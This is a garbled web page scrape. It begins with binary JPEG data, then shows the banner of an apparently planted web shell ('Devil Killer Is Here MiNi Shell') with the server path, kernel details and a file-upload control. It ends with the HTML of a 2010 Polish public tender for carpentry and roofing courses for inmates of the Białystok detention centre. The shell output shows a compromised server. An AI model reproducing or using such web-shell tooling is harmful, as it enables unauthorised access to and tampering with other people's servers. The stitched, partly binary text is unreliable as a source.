JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100407/95852-N-2010.html

<p class="kh_header"><b>Białystok: Przeprowadzenie kursów stolarza i dekarza wraz z aktywizacją zawodową osadzonych</b><br>
<b>Numer ogłoszenia: 95852 - 2010; data zamieszczenia: 07.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Białymstoku , ul. Kopernika 21, 15-377 Białystok, woj. podlaskie, tel. 085 7427021 - 23, faks 085 7427024.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów stolarza i dekarza wraz z aktywizacją zawodową osadzonych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie:
CZĘŚĆ 1
1)  kursu Stolarz dla 12 osadzonych razem z aktywizacją zawodową.
CZĘŚĆ 2
1)  kursu Dekarz dla 12 osadzonych razem z aktywizacją zawodową.
Kursy i aktywizacje zawodowe współfinansowane są ze środków Europejskiego Funduszu Społecznego  w ramach Programu Operacyjnego Kapitał Ludzki, w związku z realizacją projektu (Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności)
CZĘŚĆ 1	1)  kurs (STOLARZ)
Wymagania i warunki realizacji zamówienia:
1.Liczba beneficjentów ostatecznych zajęć - 12 osadzonych odbywających karę pozbawienia wolności w Areszcie Śledczym w Białymstoku. 
2.W przypadku rezygnacji z uczestnictwa w kursie lub wycofania osadzonego, jeżeli nie upłynęło więcej niż 20 procent godzin lekcyjnych objętych programem, w wolne miejsce Zamawiający wprowadza kolejnego osadzonego z posiadanej listy rezerwowej.
3.Celem kursu jest teoretyczne i praktyczne przygotowanie osób szkolonych zgodnie z tematyką kursu, oraz nabycie umiejętności zawodowych.
4.W ramach zajęć praktycznych przewiduje się zużycie: Płyta meblowa - 30 ark., płyta HDF 3 mm - 30 ark., obrzeże meblowe PCV 20mm na 1mm z klejem - 200 mb., zawias meblowy z prowadnikiem - 100 sz., prowadnica szuflady z pełnym wysuwem - 10 kpl., uchwyt meblowy metalowy - 30 szt., zamek meblowy - 30 szt., wieszak meblowy chromowany - 30 szt. siłownik meblowy - 20 szt., noga meblowa - 10 szt., prowadnica systemu Komandor -10 szt., wózek systemu Komandor - 20kpl., klej vikol - 3 l., wkręty meblowe - 1000 szt. jako materiały szkoleniowe zakupione przez Wykonawcę.
5.Koszt materiałów przeznaczonych do przeprowadzenia kursu powinien wynosić 40 procent całkowitej wartości kursu. Materiały pozostałe po zakończeniu kursu zakupione na realizację kursu stanowią własność Zamawiającego. Wykonawca przedłoży zamawiającemu kopie faktur VAT lub rachunków potwierdzających dostarczenie materiałów do przeprowadzenia zajęć praktycznych w ramach kursu. 
6.Szkolenie musi odbyć się na terenie Aresztu Śledczego w Białymstoku. Zamawiający zobowiązuje się zapewnić miejsce donajęć teoretycznych i praktycznych oraz następujące urządzenia i sprzęt w ramach zajęć praktycznych zakupiony w ramach realizowanego projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego:
Wyrzynarka MAKITA;
Piła el. posuwowa MAKITA;
Tablice FLIPCHART.
Brakujący sprzęt i narzędzia zapewni Wykonawca.
7.Zamawiający zapewni uczestnikom kursu bluzę, spodnie oraz obuwie robocze, pozostałe środki ochrony indywidualnej zapewni Wykonawca.
8.Zajęcia mogą odbywać się codziennie w godz. od 8:00 do 16:00 z przerwą na obiad od 13:00 do 14:00 (oprócz niedziel i dni świątecznych).
9.Wykonawca zobowiązuje się do zapewnienia uprawnionych wykładowców do realizacji części teoretycznej kursu oraz instruktorów praktycznej nauki zawodu.
10.Wykonawca po podpisaniu umowy i przed rozpoczęciem zajęć zobowiązuje się do zapewnienia uczestnikom długopisów, podręczników, skryptów i innych materiałów dydaktycznych niezbędnych do przeprowadzenia zajęć teoretycznych kursu, które po zakończeniu cyklu pozostaną na własność uczestnikom.
11.Materiały szkoleniowe oraz dokumenty szkolenia należy oznakować poprzez umieszczenie logo UE i POKL oraz informacji o środkach współfinansowania projektu. Do dokumentów szkolenia należy załączyć pokwitowanie odbioru materiałów szkoleniowych otrzymanych przez uczestników zgodnie z wykazem zawartym w ofercie.
12.Szkolenie winno obejmować łącznie 150 godzin:
- 30 godzin zajęć teoretycznych - 1 godzina dydaktyczna = 45 minut,
- 120 godzin zajęć praktycznych- 1 godzina dydaktyczna = 60 minut.
13.Wykonawca zobowiązany jest po podpisaniu umowy, a przed rozpoczęciem przedstawić program szkolenia. Program szkolenia, winien być zgodny z rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006 r. w sprawie kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216).
14.Wydane absolwentom dokumenty ukończenia kursu winny zawierać informację o realizacji kursu w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
15.Wykonawca przekaże Beneficjentom Ostatecznym skierowanym przez zamawiającego materiały szkoleniowe umożliwiające prawidłowe przygotowanie się do egzaminu końcowego.
16.Wykonawca zobowiązany jest do przeprowadzenia egzaminu końcowego i wydania uczestnikom kursu, którzy uzyskają z egzaminu ocenę wyższą od niedostatecznej, zaświadczeń o ukończeniu kursu zgodnych z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216 z późn. zm.) 
17.Czas trwania egzaminu nie wlicza się do czasu trwania kursu. 
18.Koszty egzaminów dla osób uczestniczących poniesie Wykonawca.
19.Wykonawca ubezpieczy w niezbędnym zakresie (NNW) wszystkich uczestników kursu przed rozpoczęciem zajęć - kopie polis przekaże Zamawiającemu.
20.Zamawiający dopuszcza podzielenie uczestników szkolenia na dwie 6-osobowe grupy podczas realizacji zajęć praktycznych.
21.Wykonawca zobowiązany jest do prowadzenia dokumentacji przebiegu kształcenia określonych w przepisach Rozporządzenia Ministra Edukacji i Nauki z dnia 03.02.2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. Nr 31, poz. 216.
22.Termin realizacji zamówienia - od 28.04.2010 do 31.05.2010 r.
CZĘŚĆ 1	2)  (Aktywizacja zawodowa)  uczestnikom kursu (STOLARZ).
1.Aktywizacja zawodowa obejmuje 26 godzin zajęć  aktywizacyjnych: 
a.zajęcia grupowe - 8 godz.- grupę oraz 
b.indywidualne -1,5 godz.- osobę; 1 godzina dydaktyczna = 45 minut.
2.Program szkolenia winien zawierać m.in.:	
a.Zajęcia grupowe (planowanie rozwoju kariery zawodowej, metody poszukiwania pracy, pisanie dokumentów aplikacyjnych, proces rekrutacyjny w tym przygotowanie do rozmowy kwalifikacyjnej),
b.Zajęcia indywidualne (testy, badania predyspozycji, tworzenie indywidualnego planu rozwoju ścieżki zawodowej).
3.Zamawiający zobowiązuje się zapewnić pomieszczenie, w którym odbędą się zajęcia, wyposażone w 11 stanowisk komputerowych, rzutnik multimedialny oraz Tablice FLIPCHART. 
4.Realizacja szkolenia powinna odbywać się w oparciu o nowoczesne metody i techniki dydaktyczno - pedagogiczne.
5.Zajęcia mogą odbywać się codziennie w godz. od 8:00 do 16:00 z przerwą na obiad od 13:00 do 14:00 (oprócz niedziel i dni świątecznych).
6.Wykonawca po podpisaniu umowy i przed rozpoczęciem zajęć zobowiązuje się do zapewnienia uczestnikom długopisów, podręczników, skryptów i innych materiałów dydaktycznych niezbędnych do przeprowadzenia zajęć z aktywizacji, które po zakończeniu cyklu pozostaną na własność uczestnikom.
7.Wszelkie materiały oraz dokumenty aktywizacji zawodowej Wykonawca jest zobowiązany oznakować poprzez umieszczenie logo UE i POKL oraz informacji o środkach współfinansowania projektu. Do dokumentów aktywizacji zawodowej należy załączyć pokwitowanie odbioru materiałów otrzymanych przez uczestników.
8.Zajęcia zakończą się wydaniem odpowiednich zaświadczeń potwierdzających udział w zajęciach. Wydanie absolwentom aktywizacji zawodowej dokumentu ukończenia szkolenia winno zawierać informację o realizowaniu jej w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach POKL. 
9.Termin realizacji zamówienia - od 27.05.2010 r. do 05.06.2010 r.
CZĘŚĆ 2	1)  kurs (DEKARZ)
1.Liczba beneficjentów ostatecznych zajęć - 12 osadzonych odbywających karę pozbawienia wolności w Areszcie Śledczym w Białymstoku. 
2.W przypadku rezygnacji z uczestnictwa w kursie lub wycofania osadzonego, jeżeli nie upłynęło więcej niż 20 procent godzin lekcyjnych objętych programem, w wolne miejsce Zamawiający wprowadza kolejnego osadzonego z posiadanej listy rezerwowej.
3.Celem kursu jest teoretyczne i praktyczne przygotowanie osób szkolonych zgodnie z tematyką kursu, oraz nabycie umiejętności zawodowych.
4.W ramach zajęć praktycznych przewiduje się zużycie: Tarcica 32 mm 1,5 m2, tarcica 2,5 mm 0,5 m2, blacha powlekana gładka 10 ark., blacha dachowa 100 m2, rynny 75 mm (metal) 40 mb, rynhaki 70 szt., złączka rynnowa 14 szt., lej spustowy 6 szt., denko rynnowe uniwersalne 14 szt., rura spustowa 3mb 6 szt., kolano dwukielichowe 67,5o 16 szt., kolano 67,5o 10 szt., obejma rury spustowej 10 szt., gęsior 8 mb, wkręt ,,Farmer- 2000 szt., silikon dekarski 10 szt., impregnat do więźby drewnianej (na 100 m2) jako materiały szkoleniowe zakupione przez Wykonawcę.
5.Koszt materiałów przeznaczonych do przeprowadzenia kursu powinien wynosić 40 % całkowitej wartości kursu. Materiały pozostałe po zakończeniu kursu zakupione na realizację kursu stanowią własność Zamawiającego. Wykonawca przedłoży zamawiającemu kopie faktur VAT lub rachunków potwierdzających dostarczenie materiałów do przeprowadzenia zajęć praktycznych w ramach kursu. 
6.Szkolenie musi odbyć się na terenie Aresztu Śledczego w Białymstoku. Zamawiający zobowiązuje się zapewnić miejsce donajęć teoretycznych i praktycznych oraz następujące urządzenia i sprzęt w ramach zajęć praktycznych zakupiony w ramach realizowanego projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego:
Zaginarka ZG-2000 ZDZ + nożyce krążkowe NK-100R
Nożyce elektryczne PRNk 2C wycinarka do profili + brzeszczot
Tablice FLIPCHART.
Brakujący sprzęt i narzędzia zapewni Wykonawca.
7.Zamawiający zapewni uczestnikom kursu bluzę, spodnie oraz obuwie robocze, pozostałe środki ochrony indywidualnej zapewni Wykonawca.
8.Zajęcia mogą odbywać się codziennie w godz. od 8:00 do 16:00 z przerwą na obiad od 13:00 do 14:00 (oprócz niedziel i dni świątecznych).
9.Wykonawca zobowiązuje się do zapewnienia uprawnionych wykładowców do realizacji części teoretycznej kursu oraz instruktorów praktycznej nauki zawodu.
10.Wykonawca po podpisaniu umowy i przed rozpoczęciem zajęć zobowiązuje się do zapewnienia uczestnikom długopisów, podręczników, skryptów i innych materiałów dydaktycznych niezbędnych do przeprowadzenia zajęć teoretycznych kursu, które po zakończeniu cyklu pozostaną na własność uczestnikom.
11.Materiały szkoleniowe oraz dokumenty szkolenia należy oznakować poprzez umieszczenie logo UE i POKL oraz informacji o środkach współfinansowania projektu. Do dokumentów szkolenia należy załączyć pokwitowanie odbioru materiałów szkoleniowych otrzymanych przez uczestników zgodnie z wykazem zawartym w ofercie.
12.Szkolenie winno obejmować łącznie 150 godzin:
- 30 godzin zajęć teoretycznych - 1 godzina dydaktyczna = 45 minut,
- 120 godzin zajęć praktycznych- 1 godzina dydaktyczna = 60 minut.
13.Wykonawca zobowiązany jest po podpisaniu umowy, a przed rozpoczęciem przedstawić program szkolenia. Program szkolenia, winien być zgodny z rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006 r. w sprawie kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216).
14.Wydane absolwentom dokumenty ukończenia kursu winny zawierać informację o realizacji kursu w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
15.Wykonawca przekaże Beneficjentom Ostatecznym skierowanym przez zamawiającego materiały szkoleniowe umożliwiające prawidłowe przygotowanie się do egzaminu końcowego.
16.Wykonawca zobowiązany jest do przeprowadzenia egzaminu końcowego i wydania uczestnikom kursu, którzy uzyskają z egzaminu ocenę wyższą od niedostatecznej, zaświadczeń o ukończeniu kursu zgodnych z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216 z późn. zm.) 
17.Czas trwania egzaminu nie wlicza się do czasu trwania kursu. 
18.Koszty egzaminów dla osób uczestniczących poniesie Wykonawca.
19.Wykonawca ubezpieczy w niezbędnym zakresie (NNW) wszystkich uczestników kursu przed rozpoczęciem zajęć - kopie polis przekaże Zamawiającemu.
20.Zamawiający dopuszcza podzielenie uczestników szkolenia na dwie 6-osobowe grupy podczas realizacji zajęć praktycznych.
21.Wykonawca zobowiązany jest do prowadzenia dokumentacji przebiegu kształcenia określonych w przepisach Rozporządzenia Ministra Edukacji i Nauki z dnia 03.02.2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. Nr 31, poz. 216.
22.Termin realizacji zamówienia - od 10.05.2010 do 19.06.2010 r.
CZĘŚĆ 2	2)  (Aktywizacja zawodowa)  uczestnikom kursu (DEKARZ).
1.Aktywizacja zawodowa obejmuje 26 godzin zajęć  aktywizacyjnych: 
a.zajęcia grupowe - 8 godz.- grupę oraz 
b.indywidualne -1,5 godz.-osobę; 1 godzina dydaktyczna = 45 minut.
2.Program szkolenia winien zawierać m.in.:	
a.Zajęcia grupowe (planowanie rozwoju kariery zawodowej, metody poszukiwania pracy, pisanie dokumentów aplikacyjnych, proces rekrutacyjny w tym przygotowanie do rozmowy kwalifikacyjnej),
b.Zajęcia indywidualne (testy, badania predyspozycji, tworzenie indywidualnego planu rozwoju ścieżki zawodowej).
3.Zamawiający zobowiązuje się zapewnić pomieszczenie, w którym odbędą się zajęcia, wyposażone w 11 stanowisk komputerowych, rzutnik multimedialny oraz Tablice FLIPCHART. 
4.Realizacja szkolenia powinna odbywać się w oparciu o nowoczesne metody i techniki dydaktyczno - pedagogiczne.
5.Zajęcia mogą odbywać się codziennie w godz. od 8:00 do 16:00 z przerwą na obiad od 13:00 do 14:00 (oprócz niedziel i dni świątecznych).
6.Wykonawca po podpisaniu umowy i przed rozpoczęciem zajęć zobowiązuje się do zapewnienia uczestnikom długopisów, podręczników, skryptów i innych materiałów dydaktycznych niezbędnych do przeprowadzenia zajęć z aktywizacji, które po zakończeniu cyklu pozostaną na własność uczestnikom.
7.Wszelkie materiały oraz dokumenty aktywizacji zawodowej Wykonawca jest zobowiązany oznakować poprzez umieszczenie logo UE i POKL oraz informacji o środkach współfinansowania projektu. Do dokumentów aktywizacji zawodowej należy załączyć pokwitowanie odbioru materiałów otrzymanych przez uczestników.
8.Zajęcia zakończą się wydaniem odpowiednich zaświadczeń potwierdzających udział w zajęciach. Wydanie absolwentom aktywizacji zawodowej dokumentu ukończenia szkolenia winno zawierać informację o realizowaniu jej w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach POKL..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie  o spełnianiu warunków określonych w Rozporządzeniu Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych, a także o  zapoznaniu się i przeprowadzeniu przedmiotu zamówienia zgodnie z Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004r. w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych (Dz. U. z 2004r., nr 37, poz. 337</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy w Białymstoku, ul. Kopernika 21, 15-377 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2010 godzina 09:50, miejsce: Sekretariat Aresztu Śledczego w Białymstoku, ul. Kopernika 21, 15-377 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kursy i aktywizacje zawodowe współfinansowane są ze środków Europejskiego Funduszu Społecznego  w ramach Programu Operacyjnego Kapitał Ludzki, w związku z realizacją projektu (Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> kurs Stolarz dla 12 osadzonych razem z aktywizacją zawodową.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Stolarz powinien obejmować łącznie 150 godzin:
- 30 godzin zajęć teoretycznych - 1 godzina dydaktyczna = 45 minut,
- 120 godzin zajęć praktycznych- 1 godzina dydaktyczna = 60 minut.
Aktywizacja zawodowa obejmuje 26 godzin zajęć  aktywizacyjnych: 
a.zajęcia grupowe - 8 godz.-grupa oraz 
b.indywidualne -1,5 godz.-osoba; 1 godzina dydaktyczna = 45 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 28.04.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
